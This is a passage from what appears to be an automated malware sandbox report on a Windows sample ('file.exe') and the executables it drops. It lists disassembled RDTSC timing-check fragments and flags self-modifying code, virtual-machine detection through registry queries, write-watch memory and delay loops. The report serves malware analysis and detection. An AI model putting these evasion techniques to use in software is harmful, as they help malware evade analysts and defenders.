Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360329 second address: 536038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FAAAC4EC6B0h 0x0000000f je 00007FAB1E61A978h 0x00000015 jmp 00007FAAAC4EC6B0h 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007FAAAC4EC6B0h 0x00000026 je 00007FAB1E61A961h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FAAAC4EC6B7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536038F second address: 53603CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAC4EBB38h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603CB second address: 53603D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603D1 second address: 53603E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603E2 second address: 53603F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603F3 second address: 53603F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603F7 second address: 53603FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603FD second address: 5360431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FAAAC4EBB33h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360431 second address: 5360461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAB1E61A8EAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAAAC4EC6B5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535081B second address: 5350829 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350829 second address: 535082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535082D second address: 5350833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350833 second address: 535085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAAAC4EC6AEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535085B second address: 5350878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350878 second address: 53508B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3F943F42h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov esi, 374FB0C1h 0x00000014 pushfd 0x00000015 jmp 00007FAAAC4EC6AEh 0x0000001a sbb al, FFFFFFD8h 0x0000001d jmp 00007FAAAC4EC6ABh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 mov esi, 0A3501ABh 0x0000002b push eax 0x0000002c push edx 0x0000002d mov esi, 1332D8DDh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53508B9 second address: 53508D5 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAAC4EBB32h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53508D5 second address: 53508DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53508DB second address: 5350947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FAAAC4EBB2Eh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FAAAC4EBB30h 0x00000017 push eax 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007FAAAC4EBB34h 0x00000025 mov esi, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FAAAC4EBB37h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350947 second address: 535095F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535095F second address: 5350963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350963 second address: 53509F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FAAAC4EC6AAh 0x00000014 and esi, 3DFBBF18h 0x0000001a jmp 00007FAAAC4EC6ABh 0x0000001f popfd 0x00000020 mov dl, cl 0x00000022 popad 0x00000023 test esi, esi 0x00000025 pushad 0x00000026 call 00007FAAAC4EC6B1h 0x0000002b jmp 00007FAAAC4EC6B0h 0x00000030 pop eax 0x00000031 call 00007FAAAC4EC6ABh 0x00000036 pushfd 0x00000037 jmp 00007FAAAC4EC6B8h 0x0000003c or al, 00000008h 0x0000003f jmp 00007FAAAC4EC6ABh 0x00000044 popfd 0x00000045 pop eax 0x00000046 popad 0x00000047 je 00007FAB1E622049h 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509F7 second address: 53509FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509FB second address: 53509FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509FF second address: 5350A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350A05 second address: 5350A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FAAAC4EC6B2h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000016 jmp 00007FAAAC4EC6B1h 0x0000001b mov ecx, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAAAC4EC6ADh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350A4A second address: 5350AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAC4EBB37h 0x00000009 sbb cx, D6BEh 0x0000000e jmp 00007FAAAC4EBB39h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007FAB1E621440h 0x0000001f jmp 00007FAAAC4EBB2Ah 0x00000024 test byte ptr [77516968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FAAAC4EBB2Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350AAE second address: 5350AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350AB4 second address: 5350ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350ABA second address: 5350ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350ABE second address: 5350AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FAB1E621400h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350AE8 second address: 5350B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350B05 second address: 5350B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FAAAC4EBB2Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAAAC4EBB2Eh 0x00000019 xor al, 00000038h 0x0000001c jmp 00007FAAAC4EBB2Bh 0x00000021 popfd 0x00000022 mov dx, cx 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 mov esi, edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350B57 second address: 5350BBD instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007FAAAC4EC6B5h 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 call 00007FAAAC4EC6AAh 0x00000015 pop eax 0x00000016 mov cx, bx 0x00000019 popad 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FAAAC4EC6AAh 0x00000021 or ax, 1D28h 0x00000026 jmp 00007FAAAC4EC6ABh 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAAAC4EC6B5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E36 second address: 5360E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E3A second address: 5360E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E40 second address: 5360E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edx 0x00000012 mov dl, 98h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E55 second address: 5360E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EC6B5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E8A second address: 5360EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EA7 second address: 5360EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EAB second address: 5360EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EB1 second address: 5360EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EB7 second address: 5360ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAC4EBB32h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360ED6 second address: 5360EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EDA second address: 5360EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EE0 second address: 5360EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08AF second address: 53D08BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08BF second address: 53D08E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAAAC4EC6B7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08E7 second address: 53D08EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08EB second address: 53D08EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08EF second address: 53D08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08F5 second address: 53D08FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D06BA second address: 53D06C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701F1 second address: 53701F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701F5 second address: 53701FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701FB second address: 5370201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370201 second address: 5370205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370205 second address: 5370209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370209 second address: 537021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537021A second address: 537021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537021E second address: 5370224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B21 second address: 53D0B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B27 second address: 53D0B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAAC4EBB2Ch 0x00000008 pop eax 0x00000009 mov bh, 9Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAAC4EBB34h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B55 second address: 53D0B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B64 second address: 53D0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B7C second address: 53D0B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B80 second address: 53D0B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAC4EBB2Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B96 second address: 53D0C4A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAAC4EC6B2h 0x00000008 sub eax, 72BB53A8h 0x0000000e jmp 00007FAAAC4EC6ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ecx, 7730AA9Fh 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov ch, 4Eh 0x00000020 mov ebx, 35B9C8F0h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov dx, C608h 0x0000002d pushfd 0x0000002e jmp 00007FAAAC4EC6B1h 0x00000033 sub cx, 0676h 0x00000038 jmp 00007FAAAC4EC6B1h 0x0000003d popfd 0x0000003e popad 0x0000003f push dword ptr [ebp+0Ch] 0x00000042 pushad 0x00000043 movzx esi, bx 0x00000046 mov dx, C0ACh 0x0000004a popad 0x0000004b push dword ptr [ebp+08h] 0x0000004e jmp 00007FAAAC4EC6ABh 0x00000053 call 00007FAAAC4EC6A9h 0x00000058 jmp 00007FAAAC4EC6B6h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FAAAC4EC6AEh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0C4A second address: 53D0C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAAC4EBB34h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0C73 second address: 53D0D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAC4EC6B1h 0x00000009 add eax, 476DEBF6h 0x0000000f jmp 00007FAAAC4EC6B1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FAAAC4EC6B0h 0x0000001b xor ax, 0518h 0x00000020 jmp 00007FAAAC4EC6ABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [eax] 0x0000002b jmp 00007FAAAC4EC6B9h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 pushad 0x00000035 call 00007FAAAC4EC6B7h 0x0000003a movzx esi, dx 0x0000003d pop edx 0x0000003e popad 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FAAAC4EC6B6h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0D1C second address: 53D0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0D20 second address: 53D0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CE941 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A69990 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A94BD5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CE99C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26E941 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 409990 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 434BD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26E99C instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 8F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2590000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2330000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2BD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4DE0000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0CFC rdtsc 0_2_053D0CFC
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 3326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 3304 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 482 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 742 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Window / User API: threadDelayed 380 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000343001\5.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
